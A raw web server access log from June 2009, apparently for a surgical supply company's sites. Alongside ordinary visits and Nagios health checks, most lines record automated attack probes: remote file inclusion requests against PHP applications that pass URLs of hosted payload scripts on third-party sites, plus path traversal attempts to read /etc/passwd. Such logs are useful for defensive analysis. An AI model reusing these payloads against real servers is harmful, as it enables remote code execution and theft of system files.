125.206.170.126 - - [10/Jun/2009:05:42:11 -0400] "GET //pcl/pcltar.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:42:11 -0400] "GET /logs//pcl/pcltar.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 218 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:42:11 -0400] "GET /logs/access_log.Q109052100//pcl/pcltar.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 240 "-" "Mozilla/5.0"
206.225.92.50 - - [10/Jun/2009:05:42:56 -0400] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../etc/passwd HTTP/1.0" 404 217 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:05:42:56 -0400] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../etc/passwd HTTP/1.0" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:05:42:57 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 216 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:05:42:57 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 221 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
110.45.145.92 - - [10/Jun/2009:05:43:09 -0400] "GET /logs/error_log.Q108100200/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
110.45.145.92 - - [10/Jun/2009:05:43:09 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
110.45.145.92 - - [10/Jun/2009:05:43:09 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
110.45.145.92 - - [10/Jun/2009:05:43:10 -0400] "GET /logs/access_log.Q109052800/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
110.45.145.92 - - [10/Jun/2009:05:43:51 -0400] "GET /logs/error_log.Q109051700/index.php?sayfa=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
217.125.38.117 - - [10/Jun/2009:05:44:03 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
217.125.38.117 - - [10/Jun/2009:05:44:05 -0400] "GET /logs/access_log.Q109052300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:05:46:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [10/Jun/2009:05:51:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.234.200.238 - - [10/Jun/2009:05:52:26 -0400] "GET /?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
77.234.200.238 - - [10/Jun/2009:05:52:26 -0400] "GET /logs/?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
77.234.200.238 - - [10/Jun/2009:05:52:43 -0400] "GET /logs/access_log.Q109051700/?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.234.200.238 - - [10/Jun/2009:05:52:54 -0400] "GET /logs/?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
77.234.200.238 - - [10/Jun/2009:05:52:55 -0400] "GET /?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
206.225.92.50 - - [10/Jun/2009:05:53:10 -0400] "GET /logs////vwar/backup/errors.php?error=../../../../../../../../etc/passwd HTTP/1.0" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:05:53:10 -0400] "GET /logs///vwar/backup/errors.php?error=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 227 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
216.119.103.12 - - [10/Jun/2009:05:55:37 -0400] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:55:37 -0400] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:55:37 -0400] "GET /logs/access_log.Q109031800/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:55:44 -0400] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:55:44 -0400] "GET /logs/access_log.Q109031800/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:55:45 -0400] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:55:48 -0400] "GET /logs/access_log.Q109050900/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:56:26 -0400] "GET /logs/access_log.Q109050900/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.221.130.14 - - [10/Jun/2009:05:56:42 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.14 - - [10/Jun/2009:05:56:43 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.130.14 - - [10/Jun/2009:05:56:43 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Jun/2009:05:56:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.246.179.52 - - [10/Jun/2009:05:57:07 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.246.179.52 - - [10/Jun/2009:05:57:07 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.246.179.52 - - [10/Jun/2009:05:57:09 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:05:57:19 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:05:57:19 -0400] "GET //skin/zero_vote/error.php?dir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:05:57:19 -0400] "GET /logs/access_log.Q109052800//skin/zero_vote/error.php?dir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.246.179.52 - - [10/Jun/2009:05:58:01 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.246.179.52 - - [10/Jun/2009:05:58:22 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:00:54 -0400] "GET /logs/access_log.Q109031800%20%20/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:00:54 -0400] "GET /logs/access_log.Q109050900%20%20/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:01:09 -0400] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:01:09 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:01:09 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:01:09 -0400] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:01:09 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:01:09 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:01:13 -0400] "GET /logs/access_log.Q109031800%20%20/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:01:36 -0400] "GET /logs/access_log.Q109050900%20%20/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:06:01:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.203.180.144 - - [10/Jun/2009:06:02:25 -0400] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:02:25 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:02:25 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:02:26 -0400] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:02:26 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:02:26 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:02:31 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:02:32 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:06:03:24 -0400] "GET /logs/access_log.Q109052800%20%20//skin/zero_vote/error.php?dir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
219.85.63.226 - - [10/Jun/2009:06:03:47 -0400] "GET /http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:03:48 -0400] "GET /http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
217.35.79.113 - - [10/Jun/2009:06:04:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
217.35.79.113 - - [10/Jun/2009:06:04:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
217.35.79.113 - - [10/Jun/2009:06:04:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
217.35.79.113 - - [10/Jun/2009:06:04:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
211.203.180.144 - - [10/Jun/2009:06:04:50 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:04:50 -0400] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:04:50 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:04:51 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:04:51 -0400] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:04:51 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
206.225.92.50 - - [10/Jun/2009:06:04:53 -0400] "GET /logs///errors.php?error=../../../../../../../../etc/passwd HTTP/1.0" 404 215 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:06:04:53 -0400] "GET ///errors.php?error=../../../../../../../../etc/passwd HTTP/1.0" 404 210 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:06:04:53 -0400] "GET /logs//errors.php?error=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 214 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:06:04:53 -0400] "GET //errors.php?error=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 209 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
211.203.180.144 - - [10/Jun/2009:06:05:05 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:05:06 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.132.125.167 - - [10/Jun/2009:06:04:57 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
83.132.125.167 - - [10/Jun/2009:06:05:27 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
83.132.125.167 - - [10/Jun/2009:06:05:27 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
83.132.125.167 - - [10/Jun/2009:06:05:27 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
83.132.125.167 - - [10/Jun/2009:06:05:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F70484272F70070FE041+M37+ENG HTTP/1.1" 200 37502 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
83.132.125.167 - - [10/Jun/2009:06:05:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F70474A12A7008D5E041+M37+ENG HTTP/1.1" 200 76794 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F70484272F70070FE041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
83.132.125.167 - - [10/Jun/2009:06:05:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
211.203.180.144 - - [10/Jun/2009:06:06:18 -0400] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:06:18 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:06:18 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:06:23 -0400] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:06:23 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:06:23 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:06:06:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.219.232.137 - - [10/Jun/2009:06:06:56 -0400] "GET /logs/access_log.Q109052400%20%20///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
118.219.232.137 - - [10/Jun/2009:06:06:56 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.219.232.137 - - [10/Jun/2009:06:06:56 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 4908 "-" "Mozilla/5.0"
83.132.125.167 - - [10/Jun/2009:06:07:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F704F4F72C7008E0E041+M37+ENG HTTP/1.1" 200 38436 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
83.132.125.167 - - [10/Jun/2009:06:07:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
118.69.124.55 - - [10/Jun/2009:06:07:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
118.69.124.55 - - [10/Jun/2009:06:07:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
118.219.232.137 - - [10/Jun/2009:06:07:40 -0400] "GET /logs/access_log.Q109051000%20%20///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
118.69.124.55 - - [10/Jun/2009:06:07:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
118.69.124.55 - - [10/Jun/2009:06:07:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
217.35.79.113 - - [10/Jun/2009:06:08:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.35.79.113 - - [10/Jun/2009:06:08:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.35.79.113 - - [10/Jun/2009:06:08:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.35.79.113 - - [10/Jun/2009:06:08:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
219.85.63.226 - - [10/Jun/2009:06:08:52 -0400] "GET /logs/error_log.Q109050800/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:08:53 -0400] "GET /http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:08:54 -0400] "GET /logs/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:09:16 -0400] "GET /logs/error_log.Q109050800/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:09:17 -0400] "GET /http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:09:17 -0400] "GET /logs/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
